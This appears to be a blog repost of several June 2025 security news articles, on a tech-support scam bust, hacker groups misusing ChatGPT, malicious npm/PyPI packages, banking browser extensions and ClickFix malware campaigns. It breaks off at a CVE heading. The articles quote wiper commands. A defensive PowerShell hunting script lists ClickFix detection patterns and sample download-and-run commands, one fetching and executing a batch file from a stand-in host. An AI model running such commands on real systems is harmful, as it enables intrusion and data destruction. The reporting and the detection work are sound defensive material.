Author: Mark

  • Microsoft Helps CBI Dismantle Indian Call Centers Behind Japanese Tech Support Scam

    Jun 06, 2025 | The Hacker News | Cybercrime / Financial Fraud

    India’s Central Bureau of Investigation (CBI) has revealed that it has arrested six individuals and dismantled two illegal call centers that were found to be engaging in a sophisticated transnational tech support scam targeting Japanese citizens.

    The law enforcement agency said it conducted coordinated searches at 19 locations across Delhi, Haryana, and Uttar Pradesh on May 28, 2025, as part of an initiative called Operation Chakra V, which aims to combat cyber-enabled financial crimes.

    The cybercrime syndicates, per the CBI, defrauded foreign nationals, mainly Japanese citizens, by masquerading as technical support personnel from various multinational corporations, including Microsoft.

    “The syndicate operated call centers designed to appear as legitimate customer service centers, through which victims were deceived into believing that their electronic devices were compromised,” the agency said. “Under this pretext, victims were coerced into transferring funds into mule accounts.”

    Authorities said they worked together with the National Police Agency of Japan and Microsoft, allowing them to track down the perpetrators of the scheme and its operational structure. In addition, valuable evidence in the form of computers, storage devices, digital video recorders, and phones has been seized.

    The CBI said the criminal enterprise leveraged advanced social engineering techniques and “technical subterfuge” to deceive victims and extract money under false pretenses.

    “With the growth of cybercrime-as-a-service, connectivity among cybercriminals has increased and become more global,” Microsoft’s Steven Masada said. “We must continue to look at the full ecosystem in which these actors operate and coordinate with multiple international partners to meaningfully address cybercrime.”

    The tech giant further said it has been closely working with the Japan Cybercrime Control Center (JC3) to uncover the fake technical support scam, enabling it to take down approximately 66,000 malicious domains and URLs globally since May 2024.

    The cross-sector collaboration, Redmond added, made it possible to identify the broader network behind these operations, which includes pop-up creators, search-engine optimizers, lead generators, logistics and technology providers, payment processors, and talent providers.

    “These actors used generative AI to scale their operations, including to identify potential victims, automate the creation of malicious pop-up windows, and perform language translations to target Japanese victims,” Masada said.

    “This activity highlights the increasingly sophisticated tactics employed by cybercriminals and underscores the importance of proactive global collaboration to protect victims.”

    The action comes shortly after Reuters reported that the recently disclosed data breach at Coinbase has links to India-based customer support representatives at TaskUs, who the threat actors bribed to steal customer data from the cryptocurrency exchange.

    The breach is said to have been first identified in January 2025, with TaskUs stating that it had fired two employees after they illegally accessed information from Coinbase around the same time. Coinbase has since terminated its contract with the company.

    The developments also follow the arrest of 20 suspects across 12 countries between March and May 2025 in an international operation on charges of creating and distributing child sexual abuse material (CSAM).

    “Spanish authorities arrested seven suspects, including a healthcare worker and a teacher,” INTERPOL said. “The healthcare worker allegedly paid minors from Eastern Europe for explicit images, while the teacher is accused of possessing and sharing child sexual abuse material via various online platforms.”

    Another 10 suspects have been arrested from different Latin American countries, including three in El Salvador and a teacher in Panama. The remaining arrests took place in Europe and the United States. INTERPOL said that 68 additional suspects have been identified and further investigations are currently ongoing globally.

    Source: thehackernews.com…

  • OpenAI Bans ChatGPT Accounts Used by Russian, Iranian, and Chinese Hacker Groups

    OpenAI has revealed that it banned a set of ChatGPT accounts that were likely operated by Russian-speaking threat actors and two Chinese nation-state hacking groups to assist with malware development, social media automation, and research about U.S. satellite communications technologies, among other things.

    “The [Russian-speaking] actor used our models to assist with developing and refining Windows malware, debugging code across multiple languages, and setting up their command-and-control infrastructure,” OpenAI said in its threat intelligence report. “The actor demonstrated knowledge of Windows internals and exhibited some operational security behaviors.”

    The Go-based malware campaign has been codenamed ScopeCreep by the artificial intelligence (AI) company. There is no evidence that the activity was widespread in nature.

    The threat actor, per OpenAI, used temporary email accounts to sign up for ChatGPT, using each of the created accounts to have one conversation to make a single incremental improvement to their malicious software. They subsequently abandoned the account and moved on to the next.

    This practice of using a network of accounts to fine-tune their code highlights the adversary’s focus on operational security (OPSEC), OpenAI added.

    The attackers then distributed the AI-assisted malware through a publicly available code repository that impersonated a legitimate video game crosshair overlay tool called Crosshair X. Users who ended up downloading the trojanized version of the software had their systems infected by a malware loader that would then proceed to retrieve additional payloads from an external server and execute them.

    “From there, the malware was designed to initiate a multi-stage process to escalate privileges, establish stealthy persistence, notify the threat actor, and exfiltrate sensitive data while evading detection,” OpenAI said.

    “The malware is designed to escalate privileges by relaunching with ShellExecuteW and attempts to evade detection by using PowerShell to programmatically exclude itself from Windows Defender, suppressing console windows, and inserting timing delays.”

    Other tactics incorporated by ScopeCreep include Base64 encoding to obfuscate payloads, DLL side-loading, and SOCKS5 proxies to conceal the operators’ source IP addresses.

    The end goal of the malware is to harvest credentials, tokens, and cookies stored in web browsers, and exfiltrate them to the attacker. It’s also capable of sending alerts to a Telegram channel operated by the threat actors when new victims are compromised.

    OpenAI noted that the threat actor asked its models to debug a Go code snippet related to an HTTPS request, as well as sought help with integrating Telegram API and using PowerShell commands via Go to modify Windows Defender settings, specifically when it comes to adding antivirus exclusions.

    The second group of ChatGPT accounts disabled by OpenAI are said to be associated with two hacking groups attributed to China: APT5 (aka Bronze Fleetwood, Keyhole Panda, Manganese, and UNC2630) and APT15 (aka Flea, Nylon Typhoon, Playful Taurus, Royal APT, and Vixen Panda).

    One subset engaged with the AI chatbot on open-source research into various entities of interest and on technical topics, and also used it to modify scripts and troubleshoot system configurations.

    “Another subset of the threat actors appeared to be attempting to engage in development of support activities including Linux system administration, software development, and infrastructure setup,” OpenAI said. “For these activities, the threat actors used our models to troubleshoot configurations, modify software, and perform research on implementation details.”

    This consisted of asking for assistance building software packages for offline deployment and advice pertaining to configured firewalls and name servers. The threat actors engaged in both web and Android app development activities.

    In addition, the China-linked clusters weaponized ChatGPT to work on a brute-force script that can break into FTP servers, research about using large-language models (LLMs) to automate penetration testing, and develop code to manage a fleet of Android devices to programmatically post or like content on social media platforms like Facebook, Instagram, TikTok, and X.

    Some of the other observed malicious activity clusters that harnessed ChatGPT in nefarious ways are listed below –

    • A network, consistent with the North Korea IT worker scheme, that used OpenAI’s models to drive deceptive employment campaigns by developing materials that could likely advance their fraudulent attempts to apply for IT, software engineering, and other remote jobs around the world
    • Sneer Review, a likely China-origin activity that used OpenAI’s models to bulk generate social media posts in English, Chinese, and Urdu on topics of geopolitical relevance to the country for sharing on Facebook, Reddit, TikTok, and X
    • Operation High Five, a Philippines-origin activity that used OpenAI’s models to generate bulk volumes of short comments in English and Taglish on topics related to politics and current events in the Philippines for sharing on Facebook and TikTok
    • Operation VAGue Focus, a China-origin activity that used OpenAI’s models to generate social media posts for sharing on X by posing as journalists and geopolitical analysts, asking questions about computer network attack and exploitation tools, and translating emails and messages from Chinese to English as part of suspected social engineering attempts
    • Operation Helgoland Bite, a likely Russia-origin activity that used OpenAI’s models to generate Russian language content about the German 2025 election, and criticized the U.S. and NATO, for sharing on Telegram and X
    • Operation Uncle Spam, a China-origin activity that used OpenAI’s models to generate polarized social media content supporting both sides of divisive topics within U.S. political discourse for sharing on Bluesky and X
    • Storm-2035, an Iranian influence operation that used OpenAI’s models to generate short comments in English and Spanish that expressed support for Latino rights, Scottish independence, Irish reunification, and Palestinian rights, and praised Iran’s military and diplomatic prowess for sharing on X by inauthentic accounts posing as residents of the U.S., U.K., Ireland, and Venezuela.
    • Operation Wrong Number, a likely Cambodian-origin activity related to China-run task scam syndicates that used OpenAI’s models to generate short recruitment-style messages in English, Spanish, Swahili, Kinyarwanda, German, and Haitian Creole that advertised high salaries for trivial tasks such as liking social media posts

    “Some of these companies operated by charging new recruits substantial joining fees, then using a portion of those funds to pay existing ‘employees’ just enough to maintain their engagement,” OpenAI’s Ben Nimmo, Albert Zhang, Sophia Farquhar, Max Murphy, and Kimo Bumanglag said. “This structure is characteristic of task scams.”

    Source: thehackernews.com…

  • New Supply Chain Malware Operation Hits npm and PyPI Ecosystems, Targeting Millions Globally

    Cybersecurity researchers have flagged a supply chain attack targeting over a dozen packages associated with GlueStack to deliver malware.

    The malware, introduced via a change to “lib/commonjs/index.js,” allows an attacker to run shell commands, take screenshots, and upload files to infected machines, Aikido Security told The Hacker News, stating these packages collectively account for nearly 1 million weekly downloads.

    The unauthorized access could then be used to perform various follow-on actions like mining cryptocurrency, stealing sensitive information, and even shutting down services. Aikido said the first package compromise was detected on June 6, 2025, at 9:33 p.m. GMT.

    The list of the impacted packages and the affected versions is below –

    • @gluestack-ui/utils version 0.1.16 (101 Downloads)
    • @gluestack-ui/utils version 0.1.17 (176 Downloads)
    • @react-native-aria/button version 0.2.11 (174 Downloads)
    • @react-native-aria/checkbox version 0.2.11 (577 Downloads)
    • @react-native-aria/combobox version 0.2.8 (167 Downloads)
    • @react-native-aria/disclosure version 0.2.9 (N/A)
    • @react-native-aria/focus version 0.2.10 (951 Downloads)
    • @react-native-aria/interactions version 0.2.17 (420 Downloads)
    • @react-native-aria/listbox version 0.2.10 (171 Downloads)
    • @react-native-aria/menu version 0.2.16 (54 Downloads)
    • @react-native-aria/overlay version 0.3.16 (751 Downloads)
    • @react-native-aria/radio version 0.2.14 (570 Downloads)
    • @react-native-aria/slider version 0.2.13 (264 Downloads)
    • @react-native-aria/switch version 0.2.5 (56 Downloads)
    • @react-native-aria/tabs version 0.2.14 (170 Downloads)
    • @react-native-aria/toggle version 0.2.12 (589 Downloads)
    • @react-native-aria/utils version 0.2.13 (341 Downloads)

    Furthermore, the malicious code injected into the packages is similar to the remote access trojan that was delivered following the compromise of another npm package “rand-user-agent” last month, indicating that the same threat actors could be behind the activity.

    The trojan is an updated version that supports two new commands to harvest system information (“ss_info”) and the public IP address of the host (“ss_ip”).

    The project maintainers have since revoked the access token and marked the impacted versions as deprecated. Users who may have downloaded the malicious versions are recommended to roll back to a safe version to mitigate any potential threats.

    “The potential impact is massive in scale, and the malware’s persistence mechanism is particularly concerning – attackers maintain access to infected machines even after maintainers update the packages,” the company said in a statement.

    However, in an incident report published on June 9, 2025, the project maintainers acknowledged that a public access token associated with one of their contributors was compromised, thereby allowing threat actors to publish tampered versions of react-native-aria packages along with a @gluestack-ui/utils package to npm.

    “The compromised package was published by a compromised account of an authorized maintainer,” Suraj Ahmed Choudhury said. “React Native ARIA is a frontend-only library. It does not execute any code in CLI or scripts post-install, meaning the likelihood of the malicious code executing on user systems is extremely low to none. Based on our current understanding and usage patterns, no system-level compromises are expected.”

    The maintainers also said they have revoked GitHub repository access for all non-essential contributors and enabled two-factor authentication (2FA) for publishing and GitHub access.

    Malicious Packages Found on npm Unleash Destructive Features

    The development comes as Socket discovered two rogue npm packages – express-api-sync and system-health-sync-api – that masquerade as legitimate utilities but implant wipers that can delete entire application directories.

    Published by the account “botsailer” (email: anupm019@gmail[.]com), the packages were downloaded 112 and 861 times, respectively, before being taken down.

    The first of the two packages, express-api-sync, claims to be an Express API to sync data between two databases. However, once installed and added by an unsuspecting developer to their application, it triggers the execution of malicious code upon receiving an HTTP request with a hard-coded key “DEFAULT_123.”

    Upon receipt of the key, it executes the Unix command “rm -rf *” to recursively delete all files from the current directory and below, including source code, configuration files, assets, and local databases.

    The other package is a lot more sophisticated, acting both as an information stealer and a wiper, while also modifying its deletion commands based on whether the operating system is Windows (“rd /s /q .”) or Linux (“rm -rf *”).

    “Where express-api-sync is a blunt instrument, system-health-sync-api is a Swiss Army knife of destruction with built-in intelligence gathering,” security researcher Kush Pandya said.

    A notable aspect of the npm package is that it uses email as a covert communication channel, connecting to the attacker-controlled mailbox via hard-coded SMTP credentials. The password is obfuscated using Base64-encoding, whereas the username points to an email address with a domain that’s associated with a real estate agency based in India (“auth@corehomes[.]in”).

    “Every significant event triggers an email to anupm019@gmail[.]com,” Socket said. “The email includes the full backend URL, potentially exposing internal infrastructure details, development environments, or staging servers that shouldn’t be publicly known.”

    The use of SMTP for data exfiltration is sneaky as most firewalls do not block outbound email traffic, and allows malicious traffic to blend in with legitimate application emails.

    Furthermore, the package registers endpoints at “/_/system/health” and “/_/sys/maintenance” to unleash the platform-specific destruction commands, with the latter acting as a fallback in case the main backdoor is detected and blocked.

    “Attackers first verify the backdoor via GET /_/system/health which returns the server’s hostname and status,” Pandya explained. “They can test with dry-run mode if configured, then execute destruction using POST /_/system/health or the backup POST /_/sys/maintenance endpoint with the key ‘HelloWorld.’”

    The discovery of the two new npm packages shows that threat actors are beginning to branch out beyond using bogus libraries for information and cryptocurrency theft to focus on system sabotage — something of an unusual development as they offer no financial benefits.

    PyPI Package Poses as Instagram Growth Tool to Harvest Credentials

    It also comes as the software supply chain security firm discovered a new Python-based credential harvester imad213 on the Python Package Index (PyPI) repository that claims to be an Instagram growth tool. According to statistics published on pepy.tech, the package has been downloaded 3,242 times.

    “The malware uses Base64-encoding to hide its true nature and implements a remote kill switch through a Netlify-hosted control file,” Pandya said. “When executed, it prompts users for Instagram credentials, and broadcasts them to ten different third-party bot services while pretending to boost follower counts.”

    The Python library has been uploaded by a user named im_ad__213 (aka IMAD-213), who joined the registry on March 21, 2025, and has uploaded three other packages that can harvest Facebook, Gmail, Twitter, and VK credentials (taya, a-b27) or leverage Apache Bench to target streaming platforms and APIs with distributed denial-of-service (DDoS) attacks (poppo213).

    The list of packages, which are still available for download from PyPI, is below –

    • imad213 (3,242 Downloads)
    • taya (930 Downloads)
    • a-b27 (996 Downloads)
    • poppo213 (3,165 Downloads)

    In a GitHub README.md document published by IMAD-213 about two days before “imad213” was uploaded to PyPI, the threat actor claims that the library is mainly for “educational and research purposes” and notes that they are not responsible for any misuse.

    The GitHub description also includes a “deceptive safety tip,” urging users to utilize a fake or temporary Instagram account to avoid running into any issues with their main account.

    “This creates false security, users think they’re being cautious while still handing over valid credentials to the attacker,” Pandya said.

    Once launched, the malware connects to an external server and reads a text file (“pass.txt”), proceeding with execution only if the file content matches the string “imad213.” The kill switch can serve multiple purposes, allowing the threat actor to decide who gets to run the library or to turn off every downloaded copy by simply changing the content of the control file.

    In the next step, the library prompts the user to enter their Instagram credentials, which are then saved locally in a file named “credentials.txt” and broadcast to ten different dubious bot service websites, some of which link to a network of Turkish Instagram growth tools likely operated by the same entity. The domains were registered in June 2021.

    “The emergence of this credential harvester reveals concerning trends in social media-targeted malware,” Socket said. “With ten different bot services receiving credentials, we’re seeing the early stages of credential laundering – where stolen logins are distributed across multiple services to obscure their origin.”

    Source: thehackernews.com…

  • Malicious Browser Extensions Infect Over 700 Users Across Latin America Since Early 2025

    Jun 08, 2025 | Ravie Lakshmanan | Malware / Browser Security

    Cybersecurity researchers have shed light on a new campaign that has been targeting Brazilian users since the start of 2025, infecting them with a malicious extension for Chromium-based web browsers and siphoning their authentication data.

    “Some of the phishing emails were sent from the servers of compromised companies, increasing the chances of a successful attack,” Positive Technologies security researcher Klimentiy Galkin said in a report. “The attackers used a malicious extension for Google Chrome, Microsoft Edge, and Brave browsers, as well as Mesh Agent and PDQ Connect Agent.”

    The Russian cybersecurity company, which is tracking the activity under the name Operation Phantom Enigma, said the malicious extension was downloaded 722 times from across Brazil, Colombia, the Czech Republic, Mexico, Russia, and Vietnam, among others. As many as 70 unique victim companies have been identified. Some aspects of the campaign were disclosed in early April by a researcher who goes by the alias @johnk3r on X.

    The attack starts with phishing emails disguised as invoices that trigger a multi-stage process to deploy the browser extension. The messages encourage recipients to download a file from an embedded link or open a malicious attachment contained within an archive.

    Present within the files is a batch script that is responsible for downloading and launching a PowerShell script, which, in turn, performs a series of checks to determine whether it is running in a virtualized environment and whether a piece of software named Diebold Warsaw is present.

    Developed by GAS Tecnologia, Warsaw is a security plugin that’s used to secure banking and e-commerce transactions through the Internet and mobile devices in Brazil. It’s worth noting that Latin American banking trojans like Casbaneiro have incorporated similar features, as disclosed by ESET in October 2019.

    The PowerShell script is also engineered to disable User Account Control (UAC), set up persistence by configuring the aforementioned batch script to be launched automatically upon system reboot, and establish a connection with a remote server to await further commands.

    The list of supported commands is as follows –

    • PING – Send a heartbeat message to the server by sending “PONG” in response
    • DISCONNECT – Stop the current script process on the victim’s system
    • REMOVEKL – Uninstall the script
    • CHECAEXT – Check the Windows Registry for the presence of a malicious browser extension, sending OKEXT if it exists, or NOEXT, if the extension is not found
    • START_SCREEN – Install the extension in the browser by modifying the ExtensionInstallForcelist policy, which specifies a list of apps and extensions that can be installed without user interaction

    The detected extensions (identifiers: nplfchpahihleeejpjmodggckakhglee, ckkjdiimhlanonhceggkfjlmjnenpmfm, and lkpiodmpjdhhhkdhdbnncigggodgdfli) have already been removed from the Chrome Web Store.

    Other attack chains swap the initial batch script for Windows Installer and Inno Setup installer files that are utilized to deliver the extensions. The add-on, per Positive Technologies, is equipped to execute malicious JavaScript code when the active browser tab corresponds to a web page associated with Banco do Brasil.

    Specifically, it sends the user’s authentication token and a request to the attackers’ server to receive commands to likely display a loading screen to the victim (WARTEN or SCHLIEBEN_WARTEN) or serve a malicious QR code on the bank’s web page (CODE_ZUM_LESEN). The presence of German words for the commands could either allude to the attacker’s location or that the source code was repurposed from somewhere else.

    In what appears to be an effort to maximize the number of potential victims, the unknown operators have also been found to leverage invoice-related lures to distribute installer files that deploy remote access software such as MeshCentral Agent or PDQ Connect Agent instead of a malicious browser extension.

    Positive Technologies said it also identified an open directory belonging to the attacker’s auxiliary scripts containing links with parameters that included the EnigmaCyberSecurity identifier (“<victim-domain>/about.php?key=EnigmaCyberSecurity”).

    “The study highlights the use of rather unique techniques in Latin America, including a malicious browser extension and distribution via Windows Installer and Inno Setup installers,” Galkin said.

    “Files in the attackers’ open directory indicate that infecting companies was necessary for discreetly distributing emails on their behalf. However, the main focus of the attacks remained on regular Brazilian users. The attackers’ goal is to steal authentication data from the victims’ bank accounts.”

    Source: thehackernews.com…

  • New Atomic macOS Stealer Campaign Exploits ClickFix to Target Apple Users

    Cybersecurity researchers are warning of a new malware campaign that employs the ClickFix social engineering tactic to trick users into downloading the information stealer known as Atomic macOS Stealer (AMOS) on Apple macOS systems.

    The campaign, according to CloudSEK, has been found to leverage typosquat domains mimicking U.S.-based telecom provider Spectrum.

    “macOS users are served a malicious shell script designed to steal system passwords and download an AMOS variant for further exploitation,” security researcher Koushik Pal said in a report published this week. “The script uses native macOS commands to harvest credentials, bypass security mechanisms, and execute malicious binaries.”

    It’s believed that the activity is the work of Russian-speaking cybercriminals owing to the presence of Russian language comments in the malware’s source code.

    The starting point of the attack is a web page that impersonates Spectrum (“panel-spectrum[.]net” or “spectrum-ticket[.]net”). Visitors to the sites in question are served a message instructing them to complete an hCaptcha verification check in order to “review the security” of their connection before proceeding further.

    However, when the user clicks the “I am human” checkbox for evaluation, they are displayed an error message stating “CAPTCHA verification failed,” urging them to click a button to go ahead with an “Alternative Verification.”

    Doing so causes a command to be copied to the users’ clipboard and the victim is shown a set of instructions depending on their operating system. While they are guided to run a PowerShell command on Windows by opening the Windows Run dialog, it’s substituted by a shell script that’s executed by launching the Terminal app on macOS.

    The shell script, for its part, prompts users to enter their system password and downloads a next-stage payload, in this case, a known stealer called Atomic Stealer.

    “Poorly implemented logic in the delivery sites, such as mismatched instructions across platforms, points to hastily assembled infrastructure,” Pal said.

    “The delivery pages in question for this AMOS variant campaign contained inaccuracies in both its programming and front-end logic. For Linux user agents, a PowerShell command was copied. Furthermore, the instruction ‘Press & hold the Windows Key + R’ was displayed to both Windows and Mac users.”

    The disclosure comes amid a surge in campaigns using the ClickFix tactic to deliver a wide range of malware families over the past year.

    “Actors carrying out these targeted attacks typically utilize similar techniques, tools, and procedures (TTPs) to gain initial access,” Darktrace said. “These include spear phishing attacks, drive-by compromises, or exploiting trust in familiar online platforms, such as GitHub, to deliver malicious payloads.”

    The links distributed using these vectors typically redirect the end user to a malicious URL that displays a fake CAPTCHA verification check in an attempt to deceive users into thinking that they are carrying out something innocuous, when, in reality, they are guided to execute malicious commands to fix a non-existent issue.

    The end result of this effective social engineering method is that users end up compromising their own systems, enabling threat actors to bypass security controls.

    The cybersecurity company said it identified multiple ClickFix attacks across customer environments in Europe, the Middle East, and Africa (EMEA), and in the United States. And these campaigns are gaining steam, adopting several variations but operating with the same end goal of delivering malicious payloads, ranging from trojans to stealers to ransomware.

    Earlier this week, Cofense outlined an email phishing campaign that spoofs Booking.com, targeting hotel chains and the food services sector with fake CAPTCHAs that lead to XWorm RAT, PureLogs Stealer, and DanaBot. The fact that ClickFix is flexible and easy to adapt makes it an attractive malware distribution mechanism.

    “While the exact email structure varies from sample to sample, these campaigns generally provide Booking[.]com-spoofing emails with embedded links to a ClickFix fake CAPTCHA site which is used to deliver a malicious script that runs RATs and/or information stealers,” Cofense said.

    The email security firm said it has also observed ClickFix samples mimicking cookie consent banners, wherein clicking on the “Accept” button causes a malicious script file to be downloaded. The user is subsequently prompted to run the script to accept cookies.

    In one April 2025 incident analyzed by Darktrace, unknown threat actors were found to utilize ClickFix as an attack vector to download nondescript payloads to burrow deeper into the target environment, conduct lateral movement, send system-related information to an external server via an HTTP POST request, and ultimately exfiltrate data.

    “ClickFix baiting is a widely used tactic in which threat actors exploit human error to bypass security defenses,” Darktrace said. “By tricking endpoint users into performing seemingly harmless, everyday actions, attackers gain initial access to systems where they can access and exfiltrate sensitive data.”

    Other ClickFix attacks have employed phony versions of other popular CAPTCHA services like Google reCAPTCHA and Cloudflare Turnstile for malware delivery under the guise of routine security checks.

    These fake pages are “pixel-perfect copies” of their legitimate counterparts, sometimes even injected into real-but-hacked websites to trick unsuspecting users. Stealers such as Lumma and StealC, as well as full-fledged remote access trojans (RATs) like NetSupport RAT are some of the payloads distributed via bogus Turnstile pages.

    “Modern internet users are inundated with spam checks, CAPTCHAs, and security prompts on websites, and they’ve been conditioned to click through these as quickly as possible,” SlashNext’s Daniel Kelley said. “Attackers exploit this ‘verification fatigue,’ knowing that many users will comply with whatever steps are presented if it looks routine.”
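    The paragraphs above describe the lure but not the artifact it leaves behind. ClickFix pages typically instruct the victim to open the Run dialog (Win+R), paste the clipboard contents and press Enter, and Windows Explorer records every command typed into that dialog under the RunMRU registry key. The following PowerShell is an added example, not code from Cofense, Darktrace, SlashNext or The Hacker News: it reads RunMRU and flags entries that match common ClickFix command shapes. The indicator patterns are this example's own choices rather than a vendor rule set, and the sample commands at the end are constructed for illustration.

```powershell
# Added example: hunt the Windows Run dialog history (RunMRU) for ClickFix-style commands.
# Explorer stores what was typed into Win+R under
# HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, one value per entry
# (named a, b, c, ...), each ending in the literal suffix "\1"; MRUList gives the order.
# The regexes below are this example's own indicator choices, not a vendor signature set.

$ClickFixPatterns = @(
    '\bmshta(\.exe)?\s+\S*https?:'                                   # mshta fetching a remote HTA
    '\bpowershell(\.exe)?\b.*\s-e(c|n|nc|ncodedcommand)?(\s|$)'      # -e / -enc / -EncodedCommand
    '\b(iex|invoke-expression)\b'                                     # download-and-run idiom
    '\b(irm|invoke-restmethod|iwr|invoke-webrequest|curl|wget)\b.*https?:'
    '\bcmd(\.exe)?\s+/c\s+.*\b(curl|bitsadmin|certutil)\b'           # cmd-wrapped downloaders
    '\b(regsvr32|rundll32)(\.exe)?\s+\S*https?:'                      # scriptlet / DLL from a URL
)

function Test-ClickFixCommand {
    # Returns the first matching pattern, or $null when the command looks benign.
    param([Parameter(Mandatory)][string]$Command)
    foreach ($pattern in $ClickFixPatterns) {
        if ($Command -match $pattern) { return $pattern }   # -match is case-insensitive
    }
    return $null
}

function Get-RunMruEntries {
    # Run-dialog history for the current user, most recent first. Returns nothing off Windows.
    if (-not (Get-PSDrive -Name HKCU -ErrorAction SilentlyContinue)) { return @() }
    $key = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'
    if (-not (Test-Path $key)) { return @() }
    $props = Get-ItemProperty -Path $key
    foreach ($slot in ([string]$props.MRUList).ToCharArray()) {
        $name = [string]$slot
        $raw  = $props.$name
        if ($raw) { $raw -replace '\\1$', '' }              # strip the trailing "\1" marker
    }
}

function Find-ClickFixInRunMru {
    # Joins the live RunMRU history with the matcher and emits one row per suspicious entry.
    foreach ($entry in Get-RunMruEntries) {
        $hit = Test-ClickFixCommand -Command $entry
        if ($hit) { [pscustomobject]@{ Command = $entry; MatchedPattern = $hit } }
    }
}

# Constructed sample commands (not real telemetry) so the matcher can be exercised on any machine.
# The base64 in the second entry is "iex" in UTF-16LE, the encoding -EncodedCommand expects.
$SampleCommands = @(
    'mshta https://verify-captcha[.]example/check.hta'
    'powershell -w hidden -enc aQBlAHgA'
    'notepad'
    'cmd /c curl -s https://bad.example/a.bat -o %TEMP%\a.bat && %TEMP%\a.bat'
)
$SampleCommands | ForEach-Object {
    [pscustomobject]@{ Command = $_; MatchedPattern = Test-ClickFixCommand -Command $_ }
} | Format-Table -AutoSize

# On a live Windows host, report what was actually typed into Win+R:
Find-ClickFixInRunMru | Format-Table -AutoSize
```

    Run it under the user account that was lured, since RunMRU lives in HKCU; in a fleet, the same check translates to collecting that key per user profile. A hit is not proof of compromise, but an unexpected mshta or encoded PowerShell command in a user's Run history is exactly the trace a ClickFix infection leaves after the fake CAPTCHA page is long gone.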

    Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter and LinkedIn to read more exclusive content we post.


    Source: thehackernews.com…

  • ⚡ Weekly Recap: Chrome 0-Day, Data Wipers, Misused Tools and Zero-Click iPhone Attacks

    Jun 09, 2025 | Ravie Lakshmanan | Cybersecurity / Hacking News

    Behind every security alert is a bigger story. Sometimes it’s a system being tested. Sometimes it’s trust being lost in quiet ways—through delays, odd behavior, or subtle gaps in control.

    This week, we’re looking beyond the surface to spot what really matters. Whether it’s poor design, hidden access, or silent misuse, knowing where to look can make all the difference.

    If you’re responsible for protecting systems, data, or people—these updates aren’t optional. They’re essential. These stories reveal how attackers think—and where we’re still leaving doors open.

    ⚡ Threat of the Week

    Google Releases Patches for Actively Exploited Chrome 0-Day — Google has released Google Chrome versions 137.0.7151.68/.69 for Windows and macOS, and version 137.0.7151.68 for Linux to address a high-severity out-of-bounds read and write vulnerability (CVE-2025-5419) in the V8 JavaScript and WebAssembly engine that it said has been exploited in the wild. Google credited Clement Lecigne and Benoît Sevens of Google Threat Analysis Group (TAG) with discovering and reporting the flaw on May 27, 2025. “Out-of-bounds read and write in V8 in Google Chrome prior to 137.0.7151.68 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page,” according to a description of the flaw. It’s currently not known how the flaw is being exploited in the wild, although it’s likely to be highly targeted in nature.

    🔔 Top News

    • PathWiper Used in Attack on Ukraine — An unnamed critical infrastructure entity within Ukraine was targeted by a previously unseen data wiper malware named PathWiper, which shares similarities with another wiper codenamed HermeticWiper that was used by the Russia-linked Sandworm hacking group at the outset of the Russo-Ukrainian war in early 2022. “The attack was instrumented via a legitimate endpoint administration framework, indicating that the attackers likely had access to the administrative console, which was then used to issue malicious commands and deploy PathWiper across connected endpoints,” Cisco Talos said.
    • BladedFeline Targets Iraq with Whisper and Spearal Malware — An Iran-aligned hacking group dubbed BladedFeline has been attributed to a new set of cyber attacks targeting Kurdish and Iraqi government officials in early 2024. BladedFeline, believed to be active since at least September 2017, is suspected to be a sub-cluster within OilRig, a well-known state-sponsored threat actor that’s assessed to be affiliated with Iran’s Ministry of Intelligence and Security (MOIS) and operational for over a decade. The attacks leverage an as-yet-undetermined initial access vector to deliver backdoors like Whisper (aka Veaty), Spearal, and Optimizer.
    • Vishing Group UNC6040 Targets Salesforce with Fake Data Loader App — A previously undocumented threat actor known as UNC6040 has leveraged voice phishing techniques reminiscent of Scattered Spider to breach targets of interest by posing as IT support personnel and tricking employees into installing a modified version of Salesforce’s Data Loader app in order to obtain unauthorized access to their Salesforce data and exfiltrate it. The attacks are said to overlap with a loose-knit cybercrime collective known as The Com, of which the Scattered Spider threat actor is a part. Salesforce said the observed incidents primarily relied on manipulating end users, and that they did not involve the exploitation of any security vulnerability in its systems.
    • Chrome to Distrust Certs Issued by Chunghwa Telecom and Netlock — Google’s Chrome security team has announced plans to distrust digital certificates issued by Chunghwa Telecom and Netlock citing “patterns of concerning behavior observed over the past year.” The changes are expected to be introduced in Chrome 139, which is scheduled for public release in early August 2025. “Over the past several months and years, we have observed a pattern of compliance failures, unmet improvement commitments, and the absence of tangible, measurable progress in response to publicly disclosed incident reports,” Google said. “When these factors are considered in the aggregate and considered against the inherent risk each publicly-trusted CA poses to the internet, continued public trust is no longer justified.” It’s worth noting that Apple has already moved to distrust root CA certificate “NetLock Arany (Class Gold) Főtanúsítvány” effective November 15, 2024.
    • Android Trojan Crocodilus Broadens Focus Beyond Spain and Turkey — A nascent Android banking trojan called Crocodilus is stealthily spreading onto Android devices around the world via fake banking apps, phony browser updates, and malicious ads promising fake rewards. While early campaigns mainly targeted Android users in Turkey, the malware has surfaced on devices in Poland, Spain, South America, and parts of Asia, signaling a sharp uptick in both its reach and sophistication. The malware now includes the ability to create new contacts in the victim’s address book, likely for social engineering, and to automatically harvest cryptocurrency wallet seed phrases from infected Android devices. Crocodilus is the latest reminder that malware authors keep adapting to get around Google’s defenses, even as Google adds a steady stream of new security features to counter the rising tide of malware faced by the ecosystem. Intel 471, in a report last week, highlighted an increase in Android malware incorporating hidden virtual network computing (HVNC), keylogging, and remote control functionalities, and a decrease in web injects. “While web injects remain at moderate levels, keyloggers that exploit Android’s accessibility services have become increasingly popular for harvesting sensitive data,” the company said. “Once this information is collected, malware operators often deploy HVNC to reconstruct the infected device’s screen on the server side, providing a real-time view of the victim’s activity.” This spike has also been complemented by a growing number of malware strains that are capable of bypassing Android 13 accessibility restrictions for sideloaded apps.

    🔥 Trending CVEs

    Attackers love software vulnerabilities – they’re easy doors into your systems. Every week brings fresh flaws, and waiting too long to patch can turn a minor oversight into a major breach. Below are this week’s critical vulnerabilities you need to know about. Take a look, update your software promptly, and keep attackers locked out.

